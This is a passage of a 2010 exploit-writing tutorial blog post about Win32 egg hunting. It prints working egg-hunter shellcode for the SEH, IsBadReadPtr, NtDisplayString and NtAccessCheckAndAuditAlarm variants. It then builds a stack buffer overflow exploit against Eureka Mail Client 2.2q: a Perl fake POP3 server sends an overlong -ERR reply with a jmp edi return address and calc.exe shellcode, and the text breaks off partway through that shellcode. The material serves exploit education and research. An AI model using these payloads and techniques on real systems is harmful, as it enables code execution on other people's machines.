{"id":2677,"date":"2010-01-09T19:57:00","date_gmt":"2010-01-09T18:57:00","guid":{"rendered":"http:\/\/www.corelan.be:8800\/?p=2677"},"modified":"2010-01-09T19:57:00","modified_gmt":"2010-01-09T18:57:00","slug":"exploit-writing-tutorial-part-8-win32-egg-hunting","status":"publish","type":"post","link":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/","title":{"rendered":"Exploit writing tutorial part 8 : Win32 Egg Hunting"},"content":{"rendered":"<h3>Introduction<\/h3>\n<p>Easter is still far away, so this is probably the right time to talk about ways of hunting for eggs (so you are prepared when the Easter bunny brings you another 0day vulnerability).<\/p>\n<p>In the first parts of this exploit writing tutorial series, we have talked about stack based overflows and how they can lead to arbitrary code execution. In all of the exploits that we have built so far, the location where the shellcode is placed was more or less static and\/or could be referenced by using a register (instead of a hardcoded stack address), which takes care of stability and reliability.<\/p>\n<p>In some parts of the series, I have talked about various techniques to jump to shellcode, including techniques that use one or more trampolines to get to the shellcode.\u00a0 In every example that was used to demonstrate this, the size of the available memory space on the stack was big enough to fit our entire shellcode.<\/p>\n<p>What if the available buffer size is too small to squeeze the entire shellcode into ? Well, a technique called egg hunting may help us out here. 
Egg hunting is a technique that can be categorized as \u201c<a href=\"http:\/\/en.wikipedia.org\/wiki\/Shellcode#Staged_shellcode\" target=\"_blank\" rel=\"noopener\">staged shellcode<\/a>\u201d, and it basically allows you to use a small amount of custom shellcode to find your actual (bigger) shellcode (the \u201cegg\u201d) by searching for the final shellcode in memory.\u00a0 In other words, first a small amount of code is executed, which then tries to find the real shellcode and executes it.<\/p>\n<p>There are 3 conditions that are important in order for this technique to work<\/p>\n<p>1. You must be able to jump to (jmp, call, push\/ret) &amp; execute <em>\u201csome\u201d<\/em> shellcode.\u00a0 The amount of available buffer space can be relatively small, because it will only contain the so-called \u201cegg hunter\u201d.\u00a0 The egg hunter code must be available in a predictable location (so you can reliably jump to it &amp; execute it)<\/p>\n<p>2. The final shellcode must be available somewhere in memory (stack\/heap\/\u2026).<\/p>\n<p>3. You must \u201ctag\u201d or prepend the final shellcode with a unique string\/marker\/tag. The initial shellcode (the small \u201cegg hunter\u201d) will step through memory, looking for this marker. When it finds it, it will start executing the code that is placed right after the marker using a jmp or call instruction.\u00a0 This means that you will have to define the marker in the egg hunter code, and also write it just in front of the actual shellcode.<\/p>\n<blockquote><p>Searching memory is quite processor intensive and can take a while.\u00a0 So when using an egg hunter, you will notice that<\/p>\n<p>- for a moment (while memory is searched) all CPU memory is taken.<\/p>\n<p>- it can take a while before the shellcode is executed. 
(imagine you have 3Gb of RAM)<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<h3>History &amp; Basic Techniques<\/h3>\n<p>Only a small number of manuals have been written on this subject :\u00a0 Skape wrote <a href=\"http:\/\/www.hick.org\/code\/skape\/papers\/egghunt-shellcode.pdf\" target=\"_blank\" rel=\"noopener\">this excellent paper<\/a> a while ago, and you can also find some good info on heap-only egg hunting <a href=\"http:\/\/r00tin.blogspot.com\/2009\/03\/heap-only-egg-hunter.html\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>Skape\u2019s document really is the best reference on egg hunting that can be found on the internet. It contains a number of techniques and examples for Linux and Windows, and clearly explains how egg hunting works, and how memory can be searched in a safe way.<\/p>\n<p>I\u2019m not going to repeat the technical details behind egg hunting here, because skape\u2019s document is well detailed and speaks for itself.\u00a0 I\u2019ll just use a couple of examples on how to implement them in stack based overflows.<\/p>\n<p>You just have to remember :<\/p>\n<p>- The marker needs to be unique. Usually you define the tag as 4 bytes inside the egg hunter, and prepend it 2 times (2 times right after each other, so 8 bytes) to the actual shellcode.<\/p>\n<p>- You\u2019ll have to test which memory-search technique works for a particular exploit.\u00a0 (NTAccessCheckAndAuditAlarm seems to work best on my system)<\/p>\n<p>- Each technique requires a given amount of available space to host the egg hunter code :<\/p>\n<p>the SEH technique uses about 60 bytes, the IsBadReadPtr method requires 37 bytes, the NtDisplayString method uses 32 bytes.\u00a0 (This last technique only works on NT derived versions of Windows. 
The others should work on Windows 9x as well.)<\/p>\n<p>&nbsp;<\/p>\n<h3>Egg hunter code<\/h3>\n<p>As explained above, skape has outlined 3 different egg hunting techniques for Windows based exploits.\u00a0 Again, I\u2019m not going to explain the exact reasoning behind the egg hunters, I\u2019m just going to provide you with the code needed to implement an egg hunter.<\/p>\n<p>The decision to use a particular egg hunter is based on<\/p>\n<p>- available buffer size to run the egg hunter<\/p>\n<p>- whether a certain technique for searching through memory works on your machine or for a given exploit or not. You just need to test.<\/p>\n<h4>Egg hunter using SEH injection<\/h4>\n<p>Egg hunter size = 60 bytes, Egg size = 8 bytes<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">EB21       jmp short 0x23\n59         <span style=\"color: #0000ff;\">pop<\/span> ecx\nB8<strong><span style=\"color: #ff0000;\">90509050<\/span><\/strong> mov eax,<strong><span style=\"color: #ff0000;\">0x50905090<\/span><\/strong>\u00a0 <strong><span style=\"color: #ff0000;\">; this is the tag<\/span><\/strong>\n51         <span style=\"color: #0000ff;\">push<\/span> ecx\n6AFF       <span style=\"color: #0000ff;\">push<\/span> byte -0x1\n33DB       xor ebx,ebx\n648923     mov [fs:ebx],esp\n6A02       <span style=\"color: #0000ff;\">push<\/span> byte +0x2\n59         <span style=\"color: #0000ff;\">pop<\/span> ecx\n8BFB       mov edi,ebx\nF3AF       repe scasd\n7507       jnz 0x20\nFFE7       jmp edi\n6681CBFF0F or bx,0xfff\n43         inc ebx\nEBED       jmp short 0x10\nE8DAFFFFFF call 0x2\n6A0C       <span style=\"color: #0000ff;\">push<\/span> byte +0xc\n59         <span style=\"color: #0000ff;\">pop<\/span> ecx\n8B040C     mov eax,[esp+ecx]\nB1B8       mov cl,0xb8\n83040806   add dword [eax+ecx],byte +0x6\n58         <span style=\"color: #0000ff;\">pop<\/span> eax\n83C410     add esp,byte+0x10\n50         
<span style=\"color: #0000ff;\">push<\/span> eax\n33C0       xor eax,eax\nC3         ret<\/pre>\n<p>In order to use this egg hunter, your egg hunter payload must look like this :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">my<\/span> $egghunter = \"<span style=\"color: #8b0000;\">\\xeb\\x21\\x59\\xb8<\/span>\".\n\"<span style=\"color: #8b0000;\">w00t<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x51\\x6a\\xff\\x33\\xdb\\x64\\x89\\x23\\x6a\\x02\\x59\\x8b\\xfb<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xf3\\xaf\\x75\\x07\\xff\\xe7\\x66\\x81\\xcb\\xff\\x0f\\x43\\xeb<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xed\\xe8\\xda\\xff\\xff\\xff\\x6a\\x0c\\x59\\x8b\\x04\\x0c\\xb1<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xb8\\x83\\x04\\x08\\x06\\x58\\x83\\xc4\\x10\\x50\\x33\\xc0\\xc3<\/span>\";<\/pre>\n<p>(where w00t is the tag. You could write w00t as \"\\x77\\x30\\x30\\x74\" as well)<\/p>\n<p>Note : the SEH injection technique will probably become obsolete, as SafeSeh mechanisms are becoming the de facto standard in newer OS\u2019s and Service Packs. 
So if you need to use an egg hunter on XP SP3, Vista, Win7\u2026, you\u2019ll either have to bypass safeseh one way or another, or use a different egg hunter technique (see below).<\/p>\n<p>&nbsp;<\/p>\n<h4>Egg hunter using IsBadReadPtr<\/h4>\n<p>Egg hunter size = 37 bytes, Egg size = 8 bytes<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">33DB       xor ebx,ebx\n6681CBFF0F or bx,0xfff\n43         inc ebx\n6A08       <span style=\"color: #0000ff;\">push<\/span> byte +0x8\n53         <span style=\"color: #0000ff;\">push<\/span> ebx\nB80D5BE777 mov eax,0x77e75b0d\nFFD0       call eax\n85C0       test eax,eax\n75EC       jnz 0x2\nB8<strong><span style=\"color: #ff0000;\">90509050<\/span><\/strong> mov eax,<strong><span style=\"color: #ff0000;\">0x50905090 ; this is the tag<\/span><\/strong>\n8BFB       mov edi,ebx\nAF         scasd\n75E7       jnz 0x7\nAF         scasd\n75E4       jnz 0x7\nFFE7       jmp edi<\/pre>\n<p>Egg hunter payload :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">my<\/span> $egghunter = \"<span style=\"color: #8b0000;\">\\x33\\xdb\\x66\\x81\\xcb\\xff\\x0f\\x43\\x6a\\x08<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x53\\xb8\\x0d\\x5b\\xe7\\x77\\xff\\xd0\\x85\\xc0\\x75\\xec\\xb8<\/span>\".\n\"<span style=\"color: #8b0000;\">w00t<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x8b\\xfb\\xaf\\x75\\xe7\\xaf\\x75\\xe4\\xff\\xe7<\/span>\";<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h4>Egg hunter using NtDisplayString<\/h4>\n<p>Egg hunter size = 32 bytes, Egg size = 8 bytes<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">6681CAFF0F  or dx,0x0fff\n42          inc edx\n52          <span style=\"color: #0000ff;\">push<\/span> edx\n6A43        <span style=\"color: 
#0000ff;\">push<\/span> byte +0x43\n58          <span style=\"color: #0000ff;\">pop<\/span> eax\nCD2E        <span style=\"color: #0000ff;\">int<\/span> 0x2e\n3C05        cmp al,0x5\n5A          <span style=\"color: #0000ff;\">pop<\/span> edx\n74EF        jz 0x0\nB8<strong><span style=\"color: #ff0000;\">90509050<\/span><\/strong>  mov eax,<strong><span style=\"color: #ff0000;\">0x50905090 <\/span><\/strong> <strong><span style=\"color: #ff0000;\">; this is the tag<\/span><\/strong>\n8BFA        mov edi,edx\nAF          scasd\n75EA        jnz 0x5\nAF          scasd\n75E7        jnz 0x5\nFFE7        jmp edi<\/pre>\n<p>Egg hunter payload :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">my<\/span> $egghunter =\n\"<span style=\"color: #8b0000;\">\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x43\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"<span style=\"color: #8b0000;\">w00t<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";<\/pre>\n<p>or, as seen in Immunity :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image30.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb30.png\" alt=\"image\" width=\"436\" height=\"208\" border=\"0\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<h4>Egg hunter using NtAccessCheck (AndAuditAlarm)<\/h4>\n<p>Another egg hunter that is very similar to the NtDisplayString hunter is this one :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">my<\/span> $egghunter =\n\"<span style=\"color: #8b0000;\">\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\<strong><span 
style=\"color: #ff0000;\">x02<\/span><\/strong>\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x77\\x30\\x30\\x74<\/span>\". # this is the marker\/tag: w00t\n\"<span style=\"color: #8b0000;\">\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";<\/pre>\n<p>Instead of using NtDisplayString, it uses NtAccessCheckAndAuditAlarm (offset 0x02 in the KiServiceTable) to prevent access violations from taking over your egg hunter. More info about NtAccessCheck can be found <a href=\"https:\/\/web.archive.org\/web\/20150824022405\/http:\/\/undocumented.rawol.com:80\/sbs-w2k-5-monitoring-native-api-calls.pdf\" target=\"_blank\" rel=\"noopener\">here<\/a> and here.\u00a0 Also, my friend Lincoln created a nice video about this egg hunter : watch the video here<\/p>\n<p>&nbsp;<\/p>\n<h4>Brief explanation on how NtDisplayString \/ NtAccessCheckAndAuditAlarm egg hunters work<\/h4>\n<p>These 2 egg hunters use a similar technique, but only use a different syscall to check if an access violation occurred or not (and survive the AV)<\/p>\n<p>NtDisplayString prototype :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">NtDisplayString(\nIN PUNICODE_STRING String );<\/pre>\n<p>NtAccessCheckAndAuditAlarm prototype :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"> NtAccessCheckAndAuditAlarm(\n  IN PUNICODE_STRING      SubsystemName OPTIONAL,\n  IN HANDLE               ObjectHandle OPTIONAL,\n  IN PUNICODE_STRING      ObjectTypeName OPTIONAL,\n  IN PUNICODE_STRING      ObjectName OPTIONAL,\n  IN PSECURITY_DESCRIPTOR SecurityDescriptor,\n  IN ACCESS_MASK          DesiredAccess,\n  IN PGENERIC_MAPPING     GenericMapping,\n  IN BOOLEAN              ObjectCreation,\n  OUT PULONG              GrantedAccess,\n  OUT PULONG              AccessStatus,\n  OUT PBOOLEAN       
     GenerateOnClose );<\/pre>\n<p>(prototypes found at <a title=\"http:\/\/undocumented.ntinternals.net\/\" href=\"http:\/\/undocumented.ntinternals.net\/\">http:\/\/undocumented.ntinternals.net\/<\/a>)<\/p>\n<p>&nbsp;<\/p>\n<p>This is what the hunter code does :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">6681CAFF0F  or dx,0x0fff   ; get last address in page\n42          inc edx        ; acts as a counter\n                           ;(increments the value in EDX)\n52          push edx       ; pushes edx value to the stack\n                           ;(saves our current address on the stack)\n6A02        push byte +0x2 ; push 0x2 for NtAccessCheckAndAuditAlarm\n                           ; or 0x43 (opcode 6A43) for NtDisplayString\n58          pop eax        ; pop 0x2 or 0x43 into eax\n                           ; so it can be used as parameter\n                           ; to syscall - see next\nCD2E        int 0x2e       ; tell the kernel I want to do a\n                           ; syscall using previous register\n3C05        cmp al,0x5     ; check if access violation occurs\n                           ;(0xc0000005 == ACCESS_VIOLATION)\n5A          pop edx        ; restore edx\n74EF        je xxxx        ; jump back to start (or dx,0x0fff)\nB890509050  mov eax,0x50905090 ; this is the tag (egg)\n8BFA        mov edi,edx    ; set edi to our pointer\nAF          scasd          ; compare dword at [edi] with the tag\n75EA        jnz xxxxxx     ; (back to inc edx) check egg found or not\nAF          scasd          ; when egg has been found, check 2nd copy\n75E7        jnz xxxxx      ; (jump back to \"inc edx\")\n                           ; if only the first egg was found\nFFE7       jmp edi         ; edi points to begin of the shellcode<\/pre>\n<p>(thanks Shahin Ramezany !)<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Implementing the egg hunter - All your w00t are belong to us !<\/h3>\n<p>In order to 
demonstrate how it works, we will use a <a href=\"http:\/\/www.exploit-db.com\/exploits\/10235\" target=\"_blank\" rel=\"noopener\">recently discovered vulnerability<\/a> in Eureka Mail Client v2.2q, discovered by Francis Provencher. You can get a copy of the vulnerable version of this application here :<\/p>\n<p>[download id=53]53[\/download]<\/p>\n<p>Install the application. We\u2019ll configure it later on.<\/p>\n<p>This vulnerability gets triggered when a client connects to a POP3 server.\u00a0 If this POP3 server sends long \/\u00a0 specifically crafted\u00a0 \u201c-ERR\u201d data back to the client, the client crashes and arbitrary code can be executed.<\/p>\n<p>Let\u2019s build the exploit from scratch on XP SP3 English (VirtualBox).<\/p>\n<p>We\u2019ll use some simple lines of perl code to set up a fake POP3 server and send a string of 2000 bytes back (metasploit pattern).<\/p>\n<p>First of all, grab a copy of the <a href=\"https:\/\/github.com\/corelan\/mona\" target=\"_blank\" rel=\"noopener\">pvefindaddr plugin<\/a> for Immunity Debugger.\u00a0 Put the plugin in the pycommands folder of Immunity and launch Immunity Debugger.<\/p>\n<p>Create a metasploit pattern of 2000 characters from within Immunity using the following command :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">!pvefindaddr pattern_create 2000<\/pre>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image2.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb2.png\" alt=\"image\" width=\"615\" height=\"100\" border=\"0\" \/><\/a><\/p>\n<p>In the Immunity Debugger application folder, a file called mspattern.txt is now created, containing the 2000 character Metasploit pattern.<\/p>\n<p><a 
href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image1.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb1.png\" alt=\"image\" width=\"322\" height=\"133\" border=\"0\" \/><\/a><\/p>\n<p>Open the file and copy the string to the clipboard.<\/p>\n<p>Now create your exploit perl script and use the 2000 characters as payload (in $junk)<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">use<\/span> Socket;\n#Metasploit pattern\n<span style=\"color: #0000ff;\">my<\/span> $junk = \"<span style=\"color: #8b0000;\">Aa0...<\/span>\";  #paste your 2000 bytes pattern here\n\n<span style=\"color: #0000ff;\">my<\/span> $payload=$junk;\n\n#set up listener on port 110\n<span style=\"color: #0000ff;\">my<\/span> $port=110;\n<span style=\"color: #0000ff;\">my<\/span> $proto=<span style=\"color: #0000ff;\">getprotobyname<\/span>('tcp');\n<span style=\"color: #0000ff;\">socket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\n<span style=\"color: #0000ff;\">my<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\n<span style=\"color: #0000ff;\">bind<\/span>(SERVER,$paddr);\n<span style=\"color: #0000ff;\">listen<\/span>(SERVER,SOMAXCONN);\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Listening on tcp port 110 [POP3]... 
\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Configure Eureka Mail Client to connect to this host\\n<\/span>\";\n<span style=\"color: #0000ff;\">my<\/span> $client_addr;\nwhile($client_addr=<span style=\"color: #0000ff;\">accept<\/span>(CLIENT,SERVER))\n{\n  <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Client connected, sending evil payload\\n<\/span>\";\n  while(1)\n  {\n     <span style=\"color: #0000ff;\">print<\/span> CLIENT \"<span style=\"color: #8b0000;\">-ERR <\/span>\".$payload.\"<span style=\"color: #8b0000;\">\\n<\/span>\";\n\t <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> -&gt; Sent <\/span>\".<span style=\"color: #0000ff;\">length<\/span>($payload).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n  }\n}\n<span style=\"color: #0000ff;\">close<\/span> CLIENT;\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Connection closed\\n<\/span>\";<\/pre>\n<p>&nbsp;<\/p>\n<p>Notes :<\/p>\n<p>- Don\u2019t use 2000 A\u2019s or so - it\u2019s important for the sake of this tutorial to use a Metasploit pattern\u2026 Later in this tutorial, it will become clear why this is important).<\/p>\n<p>- If 2000 characters does not trigger the overflow\/crash, try using a Metasploit pattern of 5000 chars instead<\/p>\n<p>- I used a while(1) loop because the client does not crash after the first -ERR payload.\u00a0 I know, it may look better if you would figure out how many iterations are really needed to crash the client, but I like to use endless loops because they work too most of the time \ud83d\ude42<\/p>\n<p>Run this perl script. 
It should say something like this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image3.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb3.png\" alt=\"image\" width=\"571\" height=\"119\" border=\"0\" \/><\/a><\/p>\n<p>Now launch Eureka Mail Client. Go to \u201cOptions\u201d - \u201cConnection Settings\u201d and fill in the IP address of the host that is running the perl script as POP3 server.\u00a0 In my example, I am running the fake perl POP3 server on 192.168.0.193 so my configuration looks like this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image4.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb4.png\" alt=\"image\" width=\"223\" height=\"185\" border=\"0\" \/><\/a><\/p>\n<p>(you\u2019ll have to enter something under POP Username &amp; Password, but it can be anything). 
Save the settings.<\/p>\n<p>Now attach Immunity Debugger to Eureka Email and let it run<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image5.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb5.png\" alt=\"image\" width=\"328\" height=\"155\" border=\"0\" \/><\/a><\/p>\n<p>When the client is running (with Immunity Attached), go back to Eureka Mail Client, go to \u201cFile\u201d and choose \u201cSend and receive emails\u201d<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image6.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb6.png\" alt=\"image\" width=\"90\" height=\"36\" border=\"0\" \/><\/a><\/p>\n<p>The application dies. 
You can stop the perl script (it will still be running - endless loop, remember).\u00a0 Look at the Immunity Debugger Log and registers : \u201cAccess violation when executing [37784136]\u201d<\/p>\n<p>Registers look like this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image7.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb7.png\" alt=\"image\" width=\"505\" height=\"161\" border=\"0\" \/><\/a><\/p>\n<p>Now run the following command :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">!pvefindaddr suggest<\/pre>\n<p>Now it will become clear why I used a Metasploit pattern and not just 2000 A\u2019s.\u00a0 Upon running the !pvefindaddr suggest command, this plugin will evaluate the crash, look for Metasploit pattern references, try to find offsets, try to tell what kind of exploit it is, and even try to build an example payload with the correct offsets :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image8.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb8.png\" alt=\"image\" width=\"626\" height=\"271\" border=\"0\" \/><\/a><\/p>\n<p>Life is good \ud83d\ude42<\/p>\n<p>So now we know that :<\/p>\n<p>- it\u2019s a direct RET overwrite. RET is overwritten after 710 bytes (VirtualBox). I did notice that, depending on the length of the IP address or hostname that was used to reference the POP3 server in Eureka Email (under connection settings), the offset to overwrite RET may vary. So if you use 127.0.0.1 (which is 4 bytes shorter than 192.168.0.193), the offset will be 714. 
There is a way to make the exploit generic : get the length of the local IP (because that is where the Eureka Mail Client will connect to) and calculate the offset size based on the length of the IP.\u00a0\u00a0 (723 - length of IP)<\/p>\n<p>- both ESP and EDI contain a reference to the shellcode. ESP after 714 bytes and EDI points to an offset of 991 bytes. (again, modify offsets according to what you find on your own system)<\/p>\n<p>So far so good.\u00a0 We could jump to EDI or to ESP.<\/p>\n<p>ESP points to an address on the stack (0x0012cd6c) and EDI points to an address in the .data section of the application (0x00473678 - see memory map).<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image9.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb9.png\" alt=\"image\" width=\"510\" height=\"146\" border=\"0\" \/><\/a><\/p>\n<p>If we look at ESP, we can see that we only have a limited amount of shellcode space available :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image10.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb10.png\" alt=\"image\" width=\"552\" height=\"319\" border=\"0\" \/><\/a><\/p>\n<p>Of course, you could jump to ESP, and write jumpback code at ESP so you could use a large part of the buffer before overwriting RET.\u00a0 But you will still only have something like 700 bytes of space (which is ok to spawn calc and do some other basic stuff\u2026 ).<\/p>\n<p>Jumping to EDI may work too. Use the \u2018!pvefindaddr j edi\u2019 to find all \u201cjump edi\u201d trampolines. (All addresses are written to file j.txt). 
I\u2019ll use 0x7E47B533 (from user32.dll on XP SP3). Change the script &amp; test if this normal direct RET overwrite exploit would work :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">use<\/span> Socket;\n#fill out the <span style=\"color: #0000ff;\">local<\/span> IP or hostname\n#which is used by Eureka EMail as <span style=\"color: #0000ff;\">POP<\/span>3 server\n#note : must be exact match !\n<span style=\"color: #0000ff;\">my<\/span> $localserver = \"<span style=\"color: #8b0000;\">192.168.0.193<\/span>\";\n#calculate <span style=\"color: #0000ff;\">offset<\/span> to EIP\n<span style=\"color: #0000ff;\">my<\/span> $junk = \"<span style=\"color: #8b0000;\">A<\/span>\" x (723 - <span style=\"color: #0000ff;\">length<\/span>($localserver));\n\n<span style=\"color: #0000ff;\">my<\/span> $ret=<span style=\"color: #0000ff;\">pack<\/span>('V',0x7E47B533);  #jmp edi from user32.dll XP SP3\n<span style=\"color: #0000ff;\">my<\/span> $padding = \"<span style=\"color: #8b0000;\">\\x90<\/span>\" x 277;\n\n#calc.exe\n<span style=\"color: #0000ff;\">my<\/span> $shellcode=\"<span style=\"color: #8b0000;\">\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"<span style=\"color: 
